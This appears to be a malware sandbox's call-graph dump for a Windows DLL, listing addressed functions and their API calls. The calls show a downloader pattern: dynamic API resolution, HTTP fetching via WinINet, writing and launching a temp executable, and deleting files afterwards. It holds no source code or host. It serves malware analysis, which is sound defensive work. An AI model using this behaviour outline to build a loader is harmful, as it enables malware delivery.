7481->7486 7484 7ffe1a511d0f 7482->7484 7485 7ffe1a511ce1 7482->7485 7487 7ffe1a5166f0 2 API calls 7483->7487 7489 7ffe1a511d46 7484->7489 7490 7ffe1a511d18 7484->7490 7485->7482 7488 7ffe1a5166f0 2 API calls 7485->7488 7486->7479 7491 7ffe1a511cb6 GetProcAddress 7487->7491 7492 7ffe1a511ced GetProcAddress 7488->7492 7494 7ffe1a511d4f 7489->7494 7495 7ffe1a511d7d 7489->7495 7490->7484 7493 7ffe1a5166f0 2 API calls 7490->7493 7491->7485 7492->7490 7498 7ffe1a511d24 GetProcAddress 7493->7498 7494->7489 7499 7ffe1a5166f0 2 API calls 7494->7499 7496 7ffe1a511db4 7495->7496 7497 7ffe1a511d86 7495->7497 7501 7ffe1a511deb 7496->7501 7502 7ffe1a511dbd 7496->7502 7497->7495 7500 7ffe1a5166f0 2 API calls 7497->7500 7498->7494 7503 7ffe1a511d5b GetProcAddress 7499->7503 7504 7ffe1a511d92 GetProcAddress 7500->7504 7506 7ffe1a511e22 7501->7506 7507 7ffe1a511df4 7501->7507 7502->7496 7505 7ffe1a5166f0 2 API calls 7502->7505 7503->7497 7504->7502 7508 7ffe1a511dc9 GetProcAddress 7505->7508 7510 7ffe1a511e59 InternetOpenW 7506->7510 7511 7ffe1a511e2b 7506->7511 7507->7501 7509 7ffe1a5166f0 2 API calls 7507->7509 7508->7507 7515 7ffe1a511e00 GetProcAddress 7509->7515 7513 7ffe1a512186 7510->7513 7514 7ffe1a511e7a InternetSetOptionW InternetSetOptionW InternetSetOptionW InternetConnectW 7510->7514 7511->7506 7512 7ffe1a5166f0 2 API calls 7511->7512 7516 7ffe1a511e37 GetProcAddress 7512->7516 7513->7372 7517 7ffe1a511f01 7514->7517 7518 7ffe1a51217d InternetCloseHandle 7514->7518 7515->7511 7519 7ffe1a516830 7516->7519 7520 7ffe1a511f1f 7517->7520 7521 7ffe1a511f33 7517->7521 7518->7513 7519->7510 7522 7ffe1a516790 2 API calls 7520->7522 7523 7ffe1a516790 2 API calls 7521->7523 7524 7ffe1a511f2b HttpOpenRequestW 7522->7524 7523->7524 7527 7ffe1a511f8c 7524->7527 7526 7ffe1a512172 InternetCloseHandle 7526->7518 7527->7526 7528 7ffe1a51204a SetLastError HttpSendRequestW 7527->7528 7529 7ffe1a516790 2 API calls 7527->7529 7530 7ffe1a512071 GetLastError 7528->7530 7531 7ffe1a5120da 7528->7531 7538 7ffe1a511fb2 7529->7538 7532 7ffe1a51207e 7530->7532 7533 7ffe1a512085 InternetQueryOptionW InternetSetOptionW HttpSendRequestW 7530->7533 7584 7ffe1a515980 GetProcessHeap HeapAlloc 7531->7584 7532->7531 7532->7533 7533->7531 7535 7ffe1a5120e4 7536 7ffe1a512169 InternetCloseHandle 7535->7536 7537 7ffe1a5120ec InternetReadFile 7535->7537 7536->7526 7539 7ffe1a51214e 7537->7539 7540 7ffe1a51210b 7537->7540 7538->7538 7585 7ffe1a515980 GetProcessHeap HeapAlloc 7538->7585 7541 7ffe1a5159f0 GetProcessHeap HeapFree 7539->7541 7544 7ffe1a512152 7539->7544 7540->7539 7543 7ffe1a5159b0 GetProcessHeap HeapReAlloc 7540->7543 7541->7536 7545 7ffe1a51212e InternetReadFile 7543->7545 7544->7536 7545->7539 7545->7540 7548 7ffe1a516790 2 API calls 7547->7548 7549 7ffe1a5122f3 LoadLibraryW 7548->7549 7550 7ffe1a51230a 7549->7550 7551 7ffe1a5166f0 2 API calls 7550->7551 7552 7ffe1a512316 GetProcAddress 7551->7552 7553 7ffe1a512330 7552->7553 7554 7ffe1a5166f0 2 API calls 7553->7554 7555 7ffe1a51233c GetProcAddress 7554->7555 7556 7ffe1a512356 7555->7556 7557 7ffe1a5166f0 2 API calls 7556->7557 7558 7ffe1a512362 GetProcAddress 7557->7558 7559 7ffe1a51237c 7558->7559 7586 7ffe1a512410 7559->7586 7562 7ffe1a5123a8 7563 7ffe1a516790 2 API calls 7562->7563 7564 7ffe1a5123b4 7563->7564 7565 7ffe1a5123d1 DeleteFileW 7564->7565 7566 7ffe1a5123eb 7565->7566 7566->7379 7571 7ffe1a512542 7570->7571 7572 7ffe1a512596 7570->7572 7582 7ffe1a515980 GetProcessHeap HeapAlloc 7571->7582 7572->7447 7572->7448 7594 7ffe1a516e40 7586->7594 7589 7ffe1a512381 GetModuleFileNameW 7589->7562 7590 7ffe1a516790 2 API calls 7591 7ffe1a512427 7590->7591 7591->7589 7591->7590 7593 7ffe1a5124c2 7591->7593 7602 7ffe1a517370 7591->7602 7607 7ffe1a5159f0 GetProcessHeap HeapFree 7593->7607 7608 7ffe1a517470 7594->7608 7596 7ffe1a516fe6 7596->7591 7597 7ffe1a516e54 7597->7596 7597->7597 7640 7ffe1a515980 GetProcessHeap HeapAlloc 7597->7640 7603 7ffe1a517470 12 API calls 7602->7603 7605 7ffe1a517382 7603->7605 7604 7ffe1a517442 7604->7591 7605->7604 7606 7ffe1a517430 Sleep 7605->7606 7606->7604 7606->7605 7609 7ffe1a517481 7608->7609 7634 7ffe1a5176a1 7608->7634 7610 7ffe1a516790 2 API calls 7609->7610 7611 7ffe1a5174b7 7609->7611 7612 7ffe1a51749c LoadLibraryW 7610->7612 7613 7ffe1a5166f0 2 API calls 7611->7613 7615 7ffe1a5174ef 7611->7615 7612->7611 7618 7ffe1a5174cd GetProcAddress 7613->7618 7614 7ffe1a517527 7617 7ffe1a51755f 7614->7617 7620 7ffe1a5166f0 2 API calls 7614->7620 7615->7614 7616 7ffe1a5166f0 2 API calls 7615->7616 7619 7ffe1a517505 GetProcAddress 7616->7619 7621 7ffe1a517590 7617->7621 7623 7ffe1a516790 2 API calls 7617->7623 7618->7615 7619->7614 7622 7ffe1a51753d GetProcAddress 7620->7622 7624 7ffe1a5175c8 7621->7624 7627 7ffe1a5166f0 2 API calls 7621->7627 7622->7617 7626 7ffe1a517575 LoadLibraryW 7623->7626 7625 7ffe1a517600 7624->7625 7629 7ffe1a5166f0 2 API calls 7624->7629 7630 7ffe1a517638 7625->7630 7632 7ffe1a5166f0 2 API calls 7625->7632 7626->7621 7628 7ffe1a5175a6 GetProcAddress 7627->7628 7628->7624 7631 7ffe1a5175de GetProcAddress 7629->7631 7633 7ffe1a517669 7630->7633 7636 7ffe1a516790 2 API calls 7630->7636 7631->7625 7635 7ffe1a517616 GetProcAddress 7632->7635 7633->7634 7637 7ffe1a5166f0 2 API calls 7633->7637 7634->7597 7635->7630 7638 7ffe1a51764e LoadLibraryW 7636->7638 7639 7ffe1a51767f GetProcAddress 7637->7639 7638->7633 7639->7634 7642 7ffe1a512410 17 API calls 7641->7642 7643 7ffe1a515181 7642->7643 7644 7ffe1a516790 2 API calls 7643->7644 7645 7ffe1a51518d 7644->7645 7646 7ffe1a516790 2 API calls 7645->7646 7647 7ffe1a5151a3 7646->7647 7648 7ffe1a516790 2 API calls 7647->7648 7649 7ffe1a5151b9 7648->7649 7650 7ffe1a516790 2 API calls 7649->7650 7651 7ffe1a5151c8 7650->7651 7652 7ffe1a516790 2 API calls 7651->7652 7655 7ffe1a5151d7 7652->7655 7653 7ffe1a516790 GetProcessHeap HeapAlloc 7653->7655 7654 7ffe1a515322 ExpandEnvironmentStringsW ExpandEnvironmentStringsW 7654->7655 7655->7653 7655->7654 7655->7655 7656 7ffe1a515452 GetFileAttributesW 7655->7656 7666 7ffe1a515619 7655->7666 7657 7ffe1a515462 DeleteFileW 7656->7657 7658 7ffe1a51546d GetFileAttributesW 7656->7658 7657->7658 7659 7ffe1a51547f DeleteFileW 7658->7659 7660 7ffe1a51548c GetFileAttributesW 7658->7660 7659->7660 7662 7ffe1a5155ae GetFileAttributesW 7660->7662 7663 7ffe1a5155a3 DeleteFileW 7660->7663 7664 7ffe1a5155c0 DeleteFileW 7662->7664 7665 7ffe1a5155cd RemoveDirectoryW RemoveDirectoryW 7662->7665 7663->7662 7664->7665 7665->7655 7666->7388 7668 7ffe1a517767 CoCreateInstance 7667->7668 7669 7ffe1a5178e9 7667->7669 7670 7ffe1a51779f VariantInit VariantInit VariantInit VariantInit 7668->7670 7671 7ffe1a5178db CoUninitialize 7668->7671 7669->7388 7672 7ffe1a517839 7670->7672 7671->7669 7673 7ffe1a5178a5 VariantClear VariantClear VariantClear VariantClear 7672->7673 7674 7ffe1a51783d SysAllocString 7672->7674 7673->7671 7675 7ffe1a517867 7674->7675 7676 7ffe1a517894 SysFreeString 7675->7676 7677 7ffe1a51786b SysAllocString 7675->7677 7676->7673 7678 7ffe1a517885 SysFreeString 7677->7678 7678->7676 7723 7ffe1a519d78 7679->7723 7728 7ffe1a519d9c GetLastError 7723->7728 7749 7ffe1a51c064 7728->7749 7750 7ffe1a51c074 7749->7750 7751 7ffe1a51c077 TlsGetValue 7749->7751 7750->7751 8176 7ffe1a517d80 _vswprintf_c_l 85 API calls 8175->8176 8177 7ffe1a5112f0 8176->8177 8177->7303 9206 7ffe1a515930 9207 7ffe1a517d30 9 API calls 9206->9207 9208 7ffe1a515945 9207->9208 9209 7ffe1a515670 148 API calls 9208->9209 9211 7ffe1a515951 9208->9211 9209->9211 9210 7ffe1a5145e0 78 API calls 9212 7ffe1a515960 9210->9212 9211->9210 9211->9212 9610 7ffe1a511670 SHGetFolderPathW 9611 7ffe1a511697 9610->9611 9612 7ffe1a5116a9 9610->9612 9613 7ffe1a5113a0 94 API calls 9611->9613 9614 7ffe1a5116a1 9613->9614 9615 7ffe1a511a70 9616 7ffe1a511a94 9615->9616 9617 7ffe1a511a7d 9615->9617 9618 7ffe1a511a80 Sleep 9617->9618 9618->9616 9618->9618 9619 7ffe1a515970 9620 7ffe1a511300 244 API calls 9619->9620 9621 7ffe1a515979 9620->9621 9213 7ffe1a51aeb0 9214 7ffe1a519d9c _getptd_noexit 65 API calls 9213->9214 9215 7ffe1a51aece 9214->9215 9216 7ffe1a520830 9217 7ffe1a520845 CloseHandle 9216->9217 9218 7ffe1a52084b 9216->9218 9217->9218 9622 7ffe1a51f2f0 9623 7ffe1a51c558 _setenvp 65 API calls 9622->9623 9624 7ffe1a51f303 EncodePointer 9623->9624 9625 7ffe1a51f322 9624->9625 9626 7ffe1a51c9f0 9627 7ffe1a51ca0b 9626->9627 9628 7ffe1a51c558 _setenvp 65 API calls 9627->9628 9629 7ffe1a51ca2a 9628->9629 9630 7ffe1a51c558 _setenvp 65 API calls 9629->9630 9631 7ffe1a51ca47 9629->9631 9630->9631 9632 7ffe1a523ff0 9633 7ffe1a524000 9632->9633 9635 7ffe1a52400e 9632->9635 9634 7ffe1a519f64 _mtterm 68 API calls 9633->9634 9633->9635 9634->9635 9219 7ffe1a514c35 9220 7ffe1a5166f0 2 API calls 9219->9220 9221 7ffe1a514c41 9220->9221 9222 7ffe1a5166f0 2 API calls 9221->9222 9223 7ffe1a514c50 9222->9223 9239 7ffe1a5168a0 9223->9239 9225 7ffe1a5147ba 9227 7ffe1a5122d0 23 API calls 9225->9227 9228 7ffe1a516790 2 API calls 9225->9228 9231 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 9225->9231 9232 7ffe1a514d47 9225->9232 9235 7ffe1a516790 GetProcessHeap HeapAlloc 9225->9235 9237 7ffe1a511c40 32 API calls 9225->9237 9276 7ffe1a5159f0 GetProcessHeap HeapFree 9225->9276 9227->9225 9229 7ffe1a514ce8 OpenMutexW 9228->9229 9229->9225 9230 7ffe1a514d06 CloseHandle 9229->9230 9230->9225 9231->9225 9277 7ffe1a5159f0 GetProcessHeap HeapFree 9232->9277 9235->9225 9237->9225 9240 7ffe1a516790 2 API calls 9239->9240 9241 7ffe1a5168df LoadLibraryW 9240->9241 9242 7ffe1a5168f6 9241->9242 9243 7ffe1a5166f0 2 API calls 9242->9243 9244 7ffe1a516902 GetProcAddress 9243->9244 9245 7ffe1a516830 9244->9245 9246 7ffe1a51691c GetTempPathW GetTempFileNameW DeleteFileW 9245->9246 9247 7ffe1a516cd1 9246->9247 9248 7ffe1a516961 9246->9248 9247->9225 9248->9247 9249 7ffe1a51697b GetTempFileNameW DeleteFileW 9248->9249 9249->9247 9250 7ffe1a5169a8 9249->9250 9251 7ffe1a5169af 9250->9251 9252 7ffe1a516a07 9250->9252 9254 7ffe1a516790 2 API calls 9251->9254 9258 7ffe1a5169c3 9251->9258 9253 7ffe1a516790 2 API calls 9252->9253 9253->9258 9254->9258 9257 7ffe1a516a7d _call_reportfault 9257->9247 9260 7ffe1a516a96 GetSystemDirectoryW 9257->9260 9258->9258 9278 7ffe1a516d90 CreateFileW 9258->9278 9259 7ffe1a516bb8 _call_reportfault 9259->9259 9262 7ffe1a516c6b CreateProcessW 9259->9262 9264 7ffe1a516d00 4 API calls 9259->9264 9261 7ffe1a516790 2 API calls 9260->9261 9263 7ffe1a516acd 9261->9263 9266 7ffe1a516cc7 DeleteFileW 9262->9266 9267 7ffe1a516caa CloseHandle CloseHandle 9262->9267 9283 7ffe1a516870 9263->9283 9275 7ffe1a516b68 9264->9275 9266->9247 9267->9247 9270 7ffe1a516b09 9270->9270 9292 7ffe1a5159f0 GetProcessHeap HeapFree 9270->9292 9275->9275 9293 7ffe1a5159f0 GetProcessHeap HeapFree 9275->9293 9279 7ffe1a516ddb SetFilePointer 9278->9279 9280 7ffe1a516a6c 9278->9280 9281 7ffe1a516df1 WriteFile 9279->9281 9282 7ffe1a516e14 CloseHandle 9279->9282 9280->9247 9280->9257 9280->9259 9281->9282 9282->9280 9284 7ffe1a517d80 _vswprintf_c_l 85 API calls 9283->9284 9285 7ffe1a516890 9284->9285 9286 7ffe1a516d00 MultiByteToWideChar 9285->9286 9287 7ffe1a516d38 9286->9287 9288 7ffe1a516d6a 9286->9288 9294 7ffe1a515980 GetProcessHeap HeapAlloc 9287->9294 9288->9270 9641 7ffe1a522c78 9642 7ffe1a522c80 9641->9642 9644 7ffe1a522ca0 9642->9644 9645 7ffe1a520bf0 9642->9645 9646 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9645->9646 9647 7ffe1a520c1f 9646->9647 9648 7ffe1a5218c0 __strgtold12_l 65 API calls 9647->9648 9649 7ffe1a520c4d 9648->9649 9654 7ffe1a520d50 9649->9654 9652 7ffe1a51c9d0 _cftoe_l 7 API calls 9653 7ffe1a520ca6 9652->9653 9653->9644 9657 7ffe1a520dcf _call_reportfault 9654->9657 9655 7ffe1a51c9d0 _cftoe_l 7 API calls 9656 7ffe1a520c5c 9655->9656 9656->9652 9657->9655 9657->9657 9658 7ffe1a51497c 9682 7ffe1a513020 9658->9682 9661 7ffe1a511c40 32 API calls 9662 7ffe1a514962 9661->9662 9663 7ffe1a51496f 9662->9663 9680 7ffe1a5159f0 GetProcessHeap HeapFree 9662->9680 9681 7ffe1a5159f0 GetProcessHeap HeapFree 9663->9681 9667 7ffe1a5122d0 23 API calls 9677 7ffe1a5147ba 9667->9677 9668 7ffe1a516790 2 API calls 9669 7ffe1a514ce8 OpenMutexW 9668->9669 9670 7ffe1a514d06 CloseHandle 9669->9670 9669->9677 9670->9677 9671 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 9671->9677 9672 7ffe1a514d47 9692 7ffe1a5159f0 GetProcessHeap HeapFree 9672->9692 9674 7ffe1a516790 GetProcessHeap HeapAlloc 9674->9677 9677->9667 9677->9668 9677->9671 9677->9672 9677->9674 9678 7ffe1a511c40 32 API calls 9677->9678 9691 7ffe1a5159f0 GetProcessHeap HeapFree 9677->9691 9678->9677 9693 7ffe1a515e70 9682->9693 9685 7ffe1a513145 9685->9661 9685->9677 9694 7ffe1a515e90 9693->9694 9702 7ffe1a515eb7 9693->9702 9695 7ffe1a516790 2 API calls 9694->9695 9696 7ffe1a515e9c LoadLibraryW 9695->9696 9696->9702 9697 7ffe1a5166f0 2 API calls 9703 7ffe1a515ecc GetProcAddress 9697->9703 9698 7ffe1a515f1e 9701 7ffe1a515f55 9698->9701 9705 7ffe1a5166f0 2 API calls 9698->9705 9699 7ffe1a515eee 9699->9698 9700 7ffe1a516790 2 API calls 9699->9700 9704 7ffe1a515f03 LoadLibraryW 9700->9704 9706 7ffe1a515f85 9701->9706 9708 7ffe1a516790 2 API calls 9701->9708 9702->9697 9702->9699 9703->9699 9704->9698 9707 7ffe1a515f33 GetProcAddress 9705->9707 9709 7ffe1a515fbc 9706->9709 9712 7ffe1a5166f0 2 API calls 9706->9712 9707->9701 9711 7ffe1a515f6a LoadLibraryW 9708->9711 9710 7ffe1a515ff3 9709->9710 9714 7ffe1a5166f0 2 API calls 9709->9714 9715 7ffe1a51602a 9710->9715 9717 7ffe1a5166f0 2 API calls 9710->9717 9711->9706 9713 7ffe1a515f9a GetProcAddress 9712->9713 9713->9709 9716 7ffe1a515fd1 GetProcAddress 9714->9716 9718 7ffe1a516061 9715->9718 9721 7ffe1a5166f0 2 API calls 9715->9721 9716->9710 9720 7ffe1a516008 GetProcAddress 9717->9720 9719 7ffe1a516098 9718->9719 9722 7ffe1a5166f0 2 API calls 9718->9722 9723 7ffe1a5160cf 9719->9723 9726 7ffe1a5166f0 2 API calls 9719->9726 9720->9715 9724 7ffe1a51603f GetProcAddress 9721->9724 9725 7ffe1a516076 GetProcAddress 9722->9725 9727 7ffe1a516106 9723->9727 9730 7ffe1a5166f0 2 API calls 9723->9730 9724->9718 9725->9719 9729 7ffe1a5160ad GetProcAddress 9726->9729 9728 7ffe1a516136 9727->9728 9731 7ffe1a516790 2 API calls 9727->9731 9734 7ffe1a5166f0 2 API calls 9728->9734 9736 7ffe1a51616d 9728->9736 9729->9723 9732 7ffe1a5160e4 GetProcAddress 9730->9732 9733 7ffe1a51611b LoadLibraryW 9731->9733 9732->9727 9733->9728 9735 7ffe1a51614b GetProcAddress 9734->9735 9735->9736 9737 7ffe1a51304d 9736->9737 9750 7ffe1a515980 GetProcessHeap HeapAlloc 9736->9750 9737->9685 9749 7ffe1a515980 GetProcessHeap HeapAlloc 9737->9749 8182 7ffe1a518abc 8183 7ffe1a518ad8 8182->8183 8185 7ffe1a518add 8182->8185 8248 7ffe1a51bda8 8183->8248 8186 7ffe1a518b68 8185->8186 8193 7ffe1a518b32 8185->8193 8196 7ffe1a51895c 8185->8196 8186->8193 8244 7ffe1a511ad0 8186->8244 8190 7ffe1a518baf 8191 7ffe1a51895c _CRT_INIT 145 API calls 8190->8191 8190->8193 8191->8193 8192 7ffe1a511ad0 _DllMainCRTStartup 2 API calls 8194 7ffe1a518ba2 8192->8194 8195 7ffe1a51895c _CRT_INIT 145 API calls 8194->8195 8195->8190 8197 7ffe1a51896e 8196->8197 8198 7ffe1a5189eb 8196->8198 8251 7ffe1a51b5a8 GetProcessHeap 8197->8251 8200 7ffe1a518a41 8198->8200 8206 7ffe1a5189ef _CRT_INIT 8198->8206 8202 7ffe1a518aa4 8200->8202 8203 7ffe1a518a46 8200->8203 8201 7ffe1a518973 8212 7ffe1a518977 _CRT_INIT 8201->8212 8252 7ffe1a519ee4 8201->8252 8202->8212 8377 7ffe1a519d3c 8202->8377 8204 7ffe1a51c064 _getptd_noexit TlsGetValue 8203->8204 8209 7ffe1a518a51 8204->8209 8206->8212 8347 7ffe1a51b0ec DecodePointer 8206->8347 8209->8212 8370 7ffe1a51c558 8209->8370 8210 7ffe1a518983 _RTC_Initialize 8210->8212 8217 7ffe1a518993 GetCommandLineA 8210->8217 8212->8186 8214 7ffe1a51b904 _ioterm 66 API calls 8216 7ffe1a518a21 8214->8216 8221 7ffe1a519f64 _mtterm 68 API calls 8216->8221 8269 7ffe1a51be54 GetEnvironmentStringsW 8217->8269 8220 7ffe1a519f64 _mtterm 68 API calls 8220->8212 8222 7ffe1a518a26 _CRT_INIT 8221->8222 8222->8212 8222->8220 8228 7ffe1a5189b1 8231 7ffe1a5189b5 8228->8231 8232 7ffe1a5189bc 8228->8232 8300 7ffe1a519f64 8231->8300 8309 7ffe1a51b978 8232->8309 8237 7ffe1a5189d5 8243 7ffe1a5189d9 8237->8243 8342 7ffe1a51b904 8237->8342 8243->8212 8245 7ffe1a511b08 8244->8245 8246 7ffe1a511ad8 CreateThread 8244->8246 8245->8190 8245->8192 8246->8245 8247 7ffe1a511aff CloseHandle 8246->8247 8247->8245 8249 7ffe1a51be3f 8248->8249 8250 7ffe1a51bdd0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8248->8250 8249->8185 8250->8249 8251->8201 8385 7ffe1a51b310 EncodePointer 8252->8385 8254 7ffe1a519eef 8390 7ffe1a51dd78 8254->8390 8257 7ffe1a519f56 8258 7ffe1a519f64 _mtterm 68 API calls 8257->8258 8260 7ffe1a519f5b 8258->8260 8260->8210 8270 7ffe1a5189a5 8269->8270 8272 7ffe1a51be82 8269->8272 8282 7ffe1a51b5d4 8270->8282 8271 7ffe1a51be9f WideCharToMultiByte 8273 7ffe1a51bed1 8271->8273 8274 7ffe1a51bf22 FreeEnvironmentStringsW 8271->8274 8272->8271 8272->8272 8275 7ffe1a51c5d8 _malloc_crt 65 API calls 8273->8275 8274->8270 8276 7ffe1a51bed9 8275->8276 8276->8274 8277 7ffe1a51bee1 WideCharToMultiByte 8276->8277 8278 7ffe1a51bf14 FreeEnvironmentStringsW 8277->8278 8279 7ffe1a51bf09 8277->8279 8278->8270 8280 7ffe1a51bd68 free 65 API calls 8279->8280 8281 7ffe1a51bf11 8280->8281 8281->8278 8283 7ffe1a51dbec _lock 65 API calls 8282->8283 8284 7ffe1a51b603 8283->8284 8285 7ffe1a51c558 _setenvp 65 API calls 8284->8285 8288 7ffe1a51b617 8285->8288 8286 7ffe1a51b627 _ioinit 8286->8228 8287 7ffe1a51b692 GetStartupInfoW 8289 7ffe1a51b7ee 8287->8289 8296 7ffe1a51b6ac 8287->8296 8288->8286 8288->8287 8290 7ffe1a51b8d3 8289->8290 8292 7ffe1a51b836 GetStdHandle 8289->8292 8298 7ffe1a51c09c __lock_fhandle InitializeCriticalSectionAndSpinCount 8289->8298 8398 7ffe1a51dddc LeaveCriticalSection 8290->8398 8292->8289 8294 7ffe1a51b861 GetFileType 8292->8294 8293 7ffe1a51c558 _setenvp 65 API calls 8293->8296 8294->8289 8295 7ffe1a51b708 8295->8289 8297 7ffe1a51b790 GetFileType 8295->8297 8299 7ffe1a51c09c __lock_fhandle InitializeCriticalSectionAndSpinCount 8295->8299 8296->8289 8296->8293 8296->8295 8297->8295 8298->8289 8299->8295 8301 7ffe1a519f78 8300->8301 8302 7ffe1a519f73 8300->8302 8304 7ffe1a51dc60 DeleteCriticalSection 8301->8304 8306 7ffe1a51dc7e 8301->8306 8399 7ffe1a51c048 8302->8399 8305 7ffe1a51bd68 free 65 API calls 8304->8305 8305->8301 8307 7ffe1a51dc93 DeleteCriticalSection 8306->8307 8308 7ffe1a51dca2 8306->8308 8307->8306 8308->8212 8310 7ffe1a51b990 8309->8310 8311 7ffe1a51b995 GetModuleFileNameA 8309->8311 8402 7ffe1a51a32c 8310->8402 8313 7ffe1a51b9c7 8311->8313 8406 7ffe1a51ba6c 8313->8406 8316 7ffe1a51c5d8 _malloc_crt 65 API calls 8317 7ffe1a51ba1b 8316->8317 8318 7ffe1a51ba6c parse_cmdline 65 API calls 8317->8318 8319 7ffe1a5189c1 8317->8319 8318->8319 8319->8237 8320 7ffe1a51bc34 8319->8320 8321 7ffe1a51bc51 8320->8321 8324 7ffe1a51bc56 _setenvp 8320->8324 8322 7ffe1a51a32c __initmbctable 77 API calls 8321->8322 8322->8324 8323 7ffe1a5189ca 8323->8237 8336 7ffe1a51b26c 8323->8336 8324->8323 8325 7ffe1a51c558 _setenvp 65 API calls 8324->8325 8332 7ffe1a51bc96 _setenvp 8325->8332 8326 7ffe1a51bcfa 8327 7ffe1a51bd68 free 65 API calls 8326->8327 8327->8323 8328 7ffe1a51c558 _setenvp 65 API calls 8328->8332 8329 7ffe1a51bd36 8330 7ffe1a51bd68 free 65 API calls 8329->8330 8330->8323 8332->8323 8332->8326 8332->8328 8332->8329 8333 7ffe1a51bd4f 8332->8333 8821 7ffe1a51f854 8332->8821 8334 7ffe1a518da0 _invoke_watson 13 API calls 8333->8334 8335 7ffe1a51bd64 8334->8335 8338 7ffe1a51b27e _IsNonwritableInCurrentImage 8336->8338 8830 7ffe1a51dbb0 8338->8830 8339 7ffe1a51b29b _initterm_e 8341 7ffe1a51b2be _IsNonwritableInCurrentImage doexit 8339->8341 8833 7ffe1a51f440 8339->8833 8341->8237 8344 7ffe1a51b91f 8342->8344 8343 7ffe1a5189e9 8343->8231 8344->8343 8345 7ffe1a51b936 DeleteCriticalSection 8344->8345 8346 7ffe1a51bd68 free 65 API calls 8344->8346 8345->8344 8346->8344 8348 7ffe1a51b112 8347->8348 8349 7ffe1a51b125 8347->8349 8348->8349 8351 7ffe1a51bd68 free 65 API calls 8348->8351 8350 7ffe1a51bd68 free 65 API calls 8349->8350 8352 7ffe1a51b134 8350->8352 8351->8348 8353 7ffe1a51b15b 8352->8353 8355 7ffe1a51bd68 free 65 API calls 8352->8355 8354 7ffe1a51bd68 free 65 API calls 8353->8354 8356 7ffe1a51b16a 8354->8356 8355->8352 8357 7ffe1a51bd68 free 65 API calls 8356->8357 8358 7ffe1a51b17e 8357->8358 8359 7ffe1a51bd68 free 65 API calls 8358->8359 8360 7ffe1a51b18a 8359->8360 8361 7ffe1a51b1b5 EncodePointer 8360->8361 8365 7ffe1a51bd68 free 65 API calls 8360->8365 8362 7ffe1a51b1d6 8361->8362 8363 7ffe1a51b1d1 8361->8363 8364 7ffe1a51b1ef 8362->8364 8367 7ffe1a51bd68 free 65 API calls 8362->8367 8366 7ffe1a51bd68 free 65 API calls 8363->8366 8368 7ffe1a518a17 8364->8368 8369 7ffe1a51bd68 free 65 API calls 8364->8369 8365->8361 8366->8362 8367->8364 8368->8214 8368->8222 8369->8368 8373 7ffe1a51c57d 8370->8373 8372 7ffe1a518a63 8372->8212 8374 7ffe1a51c080 8372->8374 8373->8372 8850 7ffe1a51fa44 8373->8850 8375 7ffe1a51c090 8374->8375 8376 7ffe1a51c093 TlsSetValue 8374->8376 8375->8376 8378 7ffe1a519d72 8377->8378 8380 7ffe1a519d50 8377->8380 8378->8212 8379 7ffe1a519d5a 8381 7ffe1a51c080 _getptd_noexit TlsSetValue 8379->8381 8380->8379 8382 7ffe1a51c064 _getptd_noexit TlsGetValue 8380->8382 8383 7ffe1a519d6a 8381->8383 8382->8379 8858 7ffe1a519c08 8383->8858 8386 7ffe1a51b329 _init_pointers 8385->8386 8397 7ffe1a51f478 EncodePointer 8386->8397 8388 7ffe1a51b349 _init_pointers 8389 7ffe1a51c114 34 API calls 8388->8389 8389->8254 8391 7ffe1a51dd93 8390->8391 8392 7ffe1a51c09c __lock_fhandle InitializeCriticalSectionAndSpinCount 8391->8392 8393 7ffe1a519ef4 8391->8393 8392->8391 8393->8257 8394 7ffe1a51c02c 8393->8394 8395 7ffe1a51c03f TlsAlloc 8394->8395 8396 7ffe1a51c03c 8394->8396 8396->8395 8397->8388 8400 7ffe1a51c058 8399->8400 8401 7ffe1a51c05b TlsFree 8399->8401 8400->8401 8403 7ffe1a51a339 8402->8403 8404 7ffe1a51a343 8402->8404 8412 7ffe1a51a704 8403->8412 8404->8311 8408 7ffe1a51baaa 8406->8408 8411 7ffe1a51bb10 8408->8411 8817 7ffe1a51f840 8408->8817 8409 7ffe1a51b9eb 8409->8316 8409->8319 8410 7ffe1a51f840 parse_cmdline 65 API calls 8410->8411 8411->8409 8411->8410 8413 7ffe1a519d78 _getptd 65 API calls 8412->8413 8414 7ffe1a51a728 8413->8414 8436 7ffe1a51a648 8414->8436 8419 7ffe1a51c5d8 _malloc_crt 65 API calls 8420 7ffe1a51a754 8419->8420 8430 7ffe1a51a8fd 8420->8430 8454 7ffe1a51a948 8420->8454 8423 7ffe1a51a8ff 8426 7ffe1a51a918 8423->8426 8429 7ffe1a51bd68 free 65 API calls 8423->8429 8423->8430 8424 7ffe1a51a7ea 8425 7ffe1a51a80e 8424->8425 8428 7ffe1a51bd68 free 65 API calls 8424->8428 8425->8430 8431 7ffe1a51dbec _lock 65 API calls 8425->8431 8427 7ffe1a519b98 _errno 65 API calls 8426->8427 8427->8430 8428->8425 8429->8426 8430->8404 8432 7ffe1a51a83e 8431->8432 8433 7ffe1a51a8ec 8432->8433 8435 7ffe1a51bd68 free 65 API calls 8432->8435 8464 7ffe1a51dddc LeaveCriticalSection 8433->8464 8435->8433 8437 7ffe1a519d78 _getptd 65 API calls 8436->8437 8438 7ffe1a51a657 8437->8438 8439 7ffe1a51a672 8438->8439 8440 7ffe1a51dbec _lock 65 API calls 8438->8440 8441 7ffe1a51a6f4 8439->8441 8443 7ffe1a51b234 _amsg_exit 65 API calls 8439->8443 8445 7ffe1a51a685 8440->8445 8447 7ffe1a51a354 8441->8447 8442 7ffe1a51a6bb 8465 7ffe1a51dddc LeaveCriticalSection 8442->8465 8443->8441 8445->8442 8446 7ffe1a51bd68 free 65 API calls 8445->8446 8446->8442 8466 7ffe1a517f44 8447->8466 8450 7ffe1a51a374 GetOEMCP 8453 7ffe1a51a39b 8450->8453 8451 7ffe1a51a386 8452 7ffe1a51a38b GetACP 8451->8452 8451->8453 8452->8453 8453->8419 8453->8430 8455 7ffe1a51a354 getSystemCP 67 API calls 8454->8455 8456 7ffe1a51a975 8455->8456 8457 7ffe1a51a97d setSBCS 8456->8457 8458 7ffe1a51a9bf IsValidCodePage 8456->8458 8463 7ffe1a51a9e5 _call_reportfault 8456->8463 8460 7ffe1a51c9d0 _cftoe_l 7 API calls 8457->8460 8458->8457 8459 7ffe1a51a9d0 GetCPInfo 8458->8459 8459->8457 8459->8463 8461 7ffe1a51a7df 8460->8461 8461->8423 8461->8424 8737 7ffe1a51a464 